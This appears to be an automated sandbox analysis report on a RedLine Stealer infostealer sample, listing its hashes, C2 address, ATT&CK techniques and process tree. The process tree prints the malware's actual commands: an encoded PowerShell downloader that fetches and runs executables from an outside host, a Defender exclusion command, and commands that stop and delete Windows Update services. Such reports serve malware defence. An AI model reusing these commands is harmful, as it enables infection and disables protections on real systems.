redline | 1c2f186610bc1f39f9800f9caa2dd42bdaacd88ae885fff67d7d3b9f8961dd0f

Analysis

max time kernel
61s
max time network
108s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
13-01-2023 00:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2da19a4e1c0fe008419b97a8fea15d5879297555.exe
Size

241KB
MD5

7637110e274a39065d6a09406ef525c3
SHA1

2da19a4e1c0fe008419b97a8fea15d5879297555
SHA256

1c2f186610bc1f39f9800f9caa2dd42bdaacd88ae885fff67d7d3b9f8961dd0f
SHA512

f4eb2b06956a839b4e4e353a19af1b46e69ac7215fd9d12660ecc8e25a98b0e67833b7bdf39fc25d9841bb3b8813e3dafd65bbaea0ae06af3164c925f091e924
SSDEEP

6144:jn85mUDE07RXADtNBAl1C7Wt9hHAO6XNgc+tc:goUDE07RXADExGx+2

Score

10^/10

redline 1 evasion infostealer spyware

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2500-172-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 1404 created 2176	1404	SmartDefRun.exe	53
PID 1404 created 2176	1404	SmartDefRun.exe	53
PID 1404 created 2176	1404	SmartDefRun.exe	53
PID 1404 created 2176	1404	SmartDefRun.exe	53

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	4972	powershell.exe
16	4972	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

Executes dropped EXE 3 IoCs

pid	Process
5048	new2.exe
3676	SysApp.exe
1404	SmartDefRun.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 5060 set thread context of 4884	5060	2da19a4e1c0fe008419b97a8fea15d5879297555.exe	82
PID 5048 set thread context of 2500	5048	new2.exe	92
PID 1404 set thread context of 3280	1404	SmartDefRun.exe	111

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4004	sc.exe
1608	sc.exe
3360	sc.exe
1564	sc.exe
1172	sc.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2680	5060	WerFault.exe	80
1776	5048	WerFault.exe	89

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4972	powershell.exe
4972	powershell.exe
3676	SysApp.exe
3676	SysApp.exe
3676	SysApp.exe
3676	SysApp.exe
3676	SysApp.exe
3676	SysApp.exe
3676	SysApp.exe
3676	SysApp.exe
3676	SysApp.exe
3676	SysApp.exe
1404	SmartDefRun.exe
1404	SmartDefRun.exe
3120	powershell.exe
3120	powershell.exe
1404	SmartDefRun.exe
1404	SmartDefRun.exe
1404	SmartDefRun.exe
1404	SmartDefRun.exe
1588	powershell.exe
1588	powershell.exe
1404	SmartDefRun.exe
1404	SmartDefRun.exe
3144	powershell.EXE
828	powershell.EXE
3144	powershell.EXE
828	powershell.EXE
2500	vbc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	3120	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeIncreaseQuotaPrivilege	1588	powershell.exe
Token: SeSecurityPrivilege	1588	powershell.exe
Token: SeTakeOwnershipPrivilege	1588	powershell.exe
Token: SeLoadDriverPrivilege	1588	powershell.exe
Token: SeSystemProfilePrivilege	1588	powershell.exe
Token: SeSystemtimePrivilege	1588	powershell.exe
Token: SeProfSingleProcessPrivilege	1588	powershell.exe
Token: SeIncBasePriorityPrivilege	1588	powershell.exe
Token: SeCreatePagefilePrivilege	1588	powershell.exe
Token: SeBackupPrivilege	1588	powershell.exe
Token: SeRestorePrivilege	1588	powershell.exe
Token: SeShutdownPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeSystemEnvironmentPrivilege	1588	powershell.exe
Token: SeRemoteShutdownPrivilege	1588	powershell.exe
Token: SeUndockPrivilege	1588	powershell.exe
Token: SeManageVolumePrivilege	1588	powershell.exe
Token: 33	1588	powershell.exe
Token: 34	1588	powershell.exe
Token: 35	1588	powershell.exe
Token: 36	1588	powershell.exe
Token: SeIncreaseQuotaPrivilege	1588	powershell.exe
Token: SeSecurityPrivilege	1588	powershell.exe
Token: SeTakeOwnershipPrivilege	1588	powershell.exe
Token: SeLoadDriverPrivilege	1588	powershell.exe
Token: SeSystemProfilePrivilege	1588	powershell.exe
Token: SeSystemtimePrivilege	1588	powershell.exe
Token: SeProfSingleProcessPrivilege	1588	powershell.exe
Token: SeIncBasePriorityPrivilege	1588	powershell.exe
Token: SeCreatePagefilePrivilege	1588	powershell.exe
Token: SeBackupPrivilege	1588	powershell.exe
Token: SeRestorePrivilege	1588	powershell.exe
Token: SeShutdownPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeSystemEnvironmentPrivilege	1588	powershell.exe
Token: SeRemoteShutdownPrivilege	1588	powershell.exe
Token: SeUndockPrivilege	1588	powershell.exe
Token: SeManageVolumePrivilege	1588	powershell.exe
Token: 33	1588	powershell.exe
Token: 34	1588	powershell.exe
Token: 35	1588	powershell.exe
Token: 36	1588	powershell.exe
Token: SeIncreaseQuotaPrivilege	1588	powershell.exe
Token: SeSecurityPrivilege	1588	powershell.exe
Token: SeTakeOwnershipPrivilege	1588	powershell.exe
Token: SeLoadDriverPrivilege	1588	powershell.exe
Token: SeSystemProfilePrivilege	1588	powershell.exe
Token: SeSystemtimePrivilege	1588	powershell.exe
Token: SeProfSingleProcessPrivilege	1588	powershell.exe
Token: SeIncBasePriorityPrivilege	1588	powershell.exe
Token: SeCreatePagefilePrivilege	1588	powershell.exe
Token: SeBackupPrivilege	1588	powershell.exe
Token: SeRestorePrivilege	1588	powershell.exe
Token: SeShutdownPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeSystemEnvironmentPrivilege	1588	powershell.exe
Token: SeRemoteShutdownPrivilege	1588	powershell.exe
Token: SeUndockPrivilege	1588	powershell.exe
Token: SeManageVolumePrivilege	1588	powershell.exe
Token: 33	1588	powershell.exe
Token: 34	1588	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 5060 wrote to memory of 4884	5060	2da19a4e1c0fe008419b97a8fea15d5879297555.exe	82
PID 5060 wrote to memory of 4884	5060	2da19a4e1c0fe008419b97a8fea15d5879297555.exe	82
PID 5060 wrote to memory of 4884	5060	2da19a4e1c0fe008419b97a8fea15d5879297555.exe	82
PID 5060 wrote to memory of 4884	5060	2da19a4e1c0fe008419b97a8fea15d5879297555.exe	82
PID 5060 wrote to memory of 4884	5060	2da19a4e1c0fe008419b97a8fea15d5879297555.exe	82
PID 4884 wrote to memory of 4972	4884	vbc.exe	85
PID 4884 wrote to memory of 4972	4884	vbc.exe	85
PID 4884 wrote to memory of 4972	4884	vbc.exe	85
PID 4972 wrote to memory of 5048	4972	powershell.exe	89
PID 4972 wrote to memory of 5048	4972	powershell.exe	89
PID 4972 wrote to memory of 5048	4972	powershell.exe	89
PID 4972 wrote to memory of 3676	4972	powershell.exe	90
PID 4972 wrote to memory of 3676	4972	powershell.exe	90
PID 4972 wrote to memory of 3676	4972	powershell.exe	90
PID 4972 wrote to memory of 1404	4972	powershell.exe	91
PID 4972 wrote to memory of 1404	4972	powershell.exe	91
PID 5048 wrote to memory of 2500	5048	new2.exe	92
PID 5048 wrote to memory of 2500	5048	new2.exe	92
PID 5048 wrote to memory of 2500	5048	new2.exe	92
PID 5048 wrote to memory of 2500	5048	new2.exe	92
PID 5048 wrote to memory of 2500	5048	new2.exe	92
PID 1488 wrote to memory of 1564	1488	cmd.exe	101
PID 1488 wrote to memory of 1564	1488	cmd.exe	101
PID 1488 wrote to memory of 1172	1488	cmd.exe	102
PID 1488 wrote to memory of 1172	1488	cmd.exe	102
PID 1488 wrote to memory of 4004	1488	cmd.exe	103
PID 1488 wrote to memory of 4004	1488	cmd.exe	103
PID 1488 wrote to memory of 1608	1488	cmd.exe	104
PID 1488 wrote to memory of 1608	1488	cmd.exe	104
PID 1488 wrote to memory of 3360	1488	cmd.exe	105
PID 1488 wrote to memory of 3360	1488	cmd.exe	105
PID 1488 wrote to memory of 2528	1488	cmd.exe	106
PID 1488 wrote to memory of 2528	1488	cmd.exe	106
PID 1488 wrote to memory of 3976	1488	cmd.exe	107
PID 1488 wrote to memory of 3976	1488	cmd.exe	107
PID 1488 wrote to memory of 3396	1488	cmd.exe	108
PID 1488 wrote to memory of 3396	1488	cmd.exe	108
PID 1488 wrote to memory of 4748	1488	cmd.exe	109
PID 1488 wrote to memory of 4748	1488	cmd.exe	109
PID 1488 wrote to memory of 2924	1488	cmd.exe	110
PID 1488 wrote to memory of 2924	1488	cmd.exe	110
PID 1404 wrote to memory of 3280	1404	SmartDefRun.exe	111

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2176
- C:\Users\Admin\AppData\Local\Temp\2da19a4e1c0fe008419b97a8fea15d5879297555.exe
  "C:\Users\Admin\AppData\Local\Temp\2da19a4e1c0fe008419b97a8fea15d5879297555.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:5060
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4972
    - - C:\Users\Admin\AppData\Local\Temp\new2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\new2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5048
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2500
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 492
        6⤵
        Program crash
        
        PID:1776
    - - C:\Users\Admin\AppData\Local\Temp\SysApp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3676
    - - C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1404
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 136
    3⤵
    - Program crash
    PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3120
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1488
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1564
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1172
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4004
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1608
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3360
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2528
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3976
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:3396
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4748
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
